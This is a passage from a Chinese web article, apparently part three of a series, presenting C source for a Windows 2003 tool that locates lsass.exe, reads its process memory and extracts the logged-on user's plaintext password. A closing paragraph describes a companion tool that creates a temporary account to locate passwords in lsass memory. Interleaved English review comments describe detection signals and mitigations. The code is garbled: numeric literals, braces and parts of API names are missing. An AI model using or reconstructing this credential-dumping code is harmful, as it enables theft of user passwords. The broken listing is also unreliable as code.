2024年10月在win 2003中得到登陆用户的密码的三大妙法(3)


  ⑴if (Buffer == x && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == )

  ⑵/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In

  ⑶That Way

  ⑷j = i + ;

  ⑸for (; j < nSize; j += 2)

  ⑹if (Buffer[j] > )

  ⑺Password[Count++] = Buffer[j];

  ⑻return i + ; // One Flag To Indicate We Find The Password

  ⑼return -; // Well,We Fail To Find The Password,And This Always Happens

  ⑽// End Search

  ⑾//------------------------------------------------------------------------------------

  ⑿// Purpose: To Get The Lsass.exe PID

  ⒀// Return Type: DWORD

  ⒁// Parameters: None

  ⒂//------------------------------------------------------------------------------------

  // Walks a Toolhelp process snapshot and returns the PID of the entry whose
  // image name compares equal (case-insensitively, via strcmpi) to "Lsass.EXE";
  // on a failed snapshot or first-entry read it returns early with the value
  // that was stripped from this listing, otherwise the initial value of PID.
  // NOTE(review): the page extraction dropped every numeric literal, the braces,
  // and the `do {` that pairs with the `}while(ProcessNext(...))` below, so the
  // text does not compile as shown. Digits appear to be missing from the API
  // names as well (the Toolhelp "32" suffixes) — compare against the original
  // source before relying on any identifier here. Nothing has been reconstructed.
  // Defender's note: a process that enumerates for lsass.exe and then opens it
  // (see FindPassword) is exactly the access pattern lsass-protection telemetry
  // keys on (e.g. Sysmon Event ID 10 ProcessAccess with lsass.exe as target).
  ⒃DWORD GetLsassPID()

  ⒄HANDLE hProcessSnap;

  ⒅HANDLE hProcess = NULL; // declared but never used in the visible body

  ⒆PROCESSENTRY pe;

  ⒇DWORD PID = ; // initializer stripped in extraction

  ⒈hProcessSnap = CreateToolhelpSnapshot(THCS_SNAPPROCESS, );

  ⒉if( hProcessSnap == INVALID_HANDLE_VALUE )

  // string literal below is cut off mid-line by the extraction
  ⒊printf("Fail To Create Snap Shot

  ⒋return ;

  // dwSize must be set before the first enumeration call
  ⒌pe.dwSize = sizeof(PROCESSENTRY);

  ⒍if( !ProcessFirst(hProcessSnap, &pe))

  ⒎CloseHandle(hProcessSnap); // Must clean up the snapshot object!

  ⒏return ;

  // strcmpi is a Microsoft CRT alias for _stricmp; the compared constant is stripped
  ⒐if (strcmpi(pe.szExeFile,"Lsass.EXE") == )

  ⒑PID = pe.thProcessID;

  // the matching `do {` is not present in this listing
  ⒒}while(ProcessNext( hProcessSnap, &pe));

  ⒓CloseHandle( hProcessSnap);

  ⒔return PID;

  ⒕// End GetLsassPID()

  ⒖//------------------------------------------------------------------------------------

  ⒗// Purpose: To Find The Password

  ⒘// Return Type: BOOLEAN

  ⒙// Parameters:

  ⒚// In: DWORD PID -> The Lsass.exe's PID

  ⒛//------------------------------------------------------------------------------------

  // Opens the given PID with PROCESS_VM_READ, performs a single ReadProcessMemory
  // starting at BaseAddress (a file-scope value not visible in this listing) into
  // Buffer, closes the handle, then hands the bytes read to Search and prints the
  // file-scope `Password` buffer if Search reported a hit and the string is non-empty.
  // Returns FALSE when OpenProcess or ReadProcessMemory fails; after the read the
  // only return visible is `return TRUE`, so it presumably returns TRUE whether or
  // not anything was found — confirm against the original source, since the braces
  // were stripped in extraction.
  // NOTE(review): the buffer size, read length, Found/strlen thresholds and all
  // other numeric literals are missing from this listing; it is not compilable as
  // shown and none of those values have been reconstructed here.
  // Defender's note: a user-mode process calling OpenProcess(PROCESS_VM_READ) on
  // lsass.exe followed by ReadProcessMemory is the canonical credential-access
  // signal; on later Windows versions LSA Protection (RunAsPPL) and Credential
  // Guard are the mitigations that block or remove this exposure.
  ①BOOL FindPassword(DWORD PID)

  ②HANDLE hProcess = NULL;

  ③char Buffer[ * ] = ; // array size and initializer stripped

  ④DWORD ByteGet = ;

  ⑤int Found = -; // sentinel value stripped; compared with `>=` below

  ⑥hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

  ⑦if (hProcess == NULL)

  // string literal below is cut off mid-line by the extraction
  ⑧printf("Fail To Open Process

  ⑨return FALSE;

  // ByteGet receives the number of bytes actually copied; Search is bounded by it
  ⑩if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer, * ,&ByteGet)) // Read The Memory From Lsass.exe

  Ⅰprintf("Fail To Read Memory

  ⅡCloseHandle(hProcess);

  Ⅲreturn FALSE;

  // handle is released before searching; the local copy in Buffer is all that is used
  ⅣCloseHandle(hProcess);

  ⅤFound = Search(Buffer,ByteGet); // Search The Password

  Ⅵif (Found >= ) // We May Find The Password

  Ⅶif (strlen(Password) > ) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not

  // format string split across two lines by the extraction; the quotes around
  // %s are unescaped here and were presumably \" in the original
  Ⅷprintf("Found Password At #x%x -> "%s"

  Ⅸ",Found + BaseAddress,Password);

  Ⅹprintf("Fail To Find The Password

  ㈠return TRUE;

  ㈡// End FindPassword

  ㈢//------------------------------------------------------------------------------------

  ㈣// Purpose: Check If The Box Is windows

  ㈤// Return Type: BOOLEAN

  ㈥// Parameters: None

  ㈦//------------------------------------------------------------------------------------

  // Reports whether the running OS's major and minor version equal two constants
  // that were stripped from this listing (the function name presumably lost its
  // digits in the same extraction — the page title suggests a Windows 2003 check).
  // Queries GetVersionEx with an OSVERSIONINFOEX; if that fails, dwOSVersionInfoSize
  // is reset to sizeof(OSVERSIONINFO) but no retry call is visible here — either
  // dropped by the extraction or the fallback is genuinely incomplete; confirm
  // against the original source. Braces are missing, so it does not compile as shown.
  // GetVersionEx is deprecated; VerifyVersionInfo / the VersionHelpers functions
  // are the supported replacement for version gating.
  ㈧BOOL Is()

  ㈨OSVERSIONINFOEX osvi;

  ㈩BOOL bsVersionInfoEx; // holds the call result only; not read afterwards

  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

  if (!(bsVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

  // fallback size is set here, but the second GetVersionEx call is not in this listing
  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

  // both comparison constants were stripped in extraction
  return (osvi.dwMajorVersion == && osvi.dwMinorVersion == );

  // End Is()

  // End Of File

  附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

  .locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

  .Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。